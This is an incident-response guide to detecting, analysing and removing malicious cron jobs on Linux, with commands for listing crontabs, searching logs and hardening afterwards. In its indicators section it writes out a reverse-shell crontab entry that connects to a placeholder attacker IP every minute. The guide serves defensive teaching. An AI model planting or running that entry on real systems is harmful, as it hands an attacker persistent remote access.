Cron Job

Cron Job Analysis in Incident Response (Linux Systems)

Cron jobs are a key component of Linux systems for automating tasks, but they can be exploited by attackers to establish persistence. Here's a comprehensive guide to analyzing, detecting, and eradicating malicious cron jobs during an incident response.

---

Understanding Cron and Crontab

• Cron: The daemon that executes scheduled tasks.

• Cron Job: A scheduled task defined in a crontab file.

• Crontab: A configuration file that specifies cron jobs.

Crontab File Structure

Each crontab entry has the following format:

<Minute> <Hour> <Day_of_Month> <Month> <Day_of_Week> <Command>

Examples:

• Every 5 minutes: */5 * * * * /root/check_system.sh

• Daily at 2 AM: 0 2 * * * /usr/local/bin/backup.sh

• Every Monday at 10 AM: 0 10 * * 1 /usr/bin/cleanup.sh

---

Incident Response Steps

1. List All Cron Jobs

System-Wide Cron Jobs

System-wide cron jobs are configured for the entire system:

cat /etc/crontab

Cron Jobs in Drop-In Directories

Cron jobs may be defined in:

cat /etc/cron.d/*

User-Specific Cron Jobs

Each user’s crontab can be found in:

cat /var/spool/cron/crontabs/*

Or:

cat /var/spool/cron/*

To list the current user’s cron jobs:

crontab -l

To list another user's cron jobs:

crontab -u USERNAME -l

2. Analyze Historical Cron Job Data

Attackers may delete cron jobs after execution. Logs provide valuable insights.

Using Syslog

cat /var/log/syslog | grep CRON

Example Output:

Nov 13 03:20:01 server CRON[2345]: (root) CMD (/tmp/malicious.sh)

Using Journalctl

journalctl -u cron

For a specific timeframe:

journalctl -u cron --since "2024-11-12" --until "2024-11-13"

3. Analyze Cron Jobs

Focus on these indicators:

• Execution Timing: Frequent or odd execution times (e.g., every minute).

• Commands/Scripts:

  • Scripts or binaries running from unusual locations like /tmp, /dev/shm, or /var/tmp.

  • Suspicious filenames: backdoor.sh, rev.sh, script.sh.

• Reverse Shells:

  * * * * * bash -i >& /dev/tcp/attacker_ip/4444 0>&1

4. Determine Execution History

To confirm if the malicious cron job was executed, search for the specific script or command in the logs:

cat /var/log/syslog | grep "/path/to/malicious_script.sh"

Or:

journalctl -u cron | grep "/path/to/malicious_script.sh"

---

Eradication Steps

1. Remove Malicious Cron Jobs

Edit the crontab to remove the malicious entry:

crontab -e

For user-specific cron jobs:

crontab -u USERNAME -e

2. Delete Malicious Scripts

Identify and remove the associated malicious scripts:

rm /path/to/malicious_script.sh

3. Reload Cron Daemon

Ensure cron reloads the updated configuration:

systemctl reload cron

4. Validate the Changes

Recheck for active cron jobs:

cat /etc/crontab
cat /var/spool/cron/crontabs/*

---

Post-Incident Actions

1. Audit File Permissions: Ensure only authorized users can modify crontab files.

   ls -l /var/spool/cron/crontabs

2. Limit User Access: Restrict the ability to create or edit cron jobs to specific users.

3. Monitor for Unauthorized Changes: Use file integrity monitoring tools like Tripwire or AIDE to track modifications in cron directories.

4. Centralize Log Analysis: Set up centralized logging to detect anomalies across systems.

---

Key Points

Cron jobs are a powerful tool but can be exploited by attackers for persistence. By systematically listing, analyzing, and removing unauthorized cron jobs, you can neutralize these threats and secure your system. Regular audits and proactive monitoring are essential to prevent future incidents.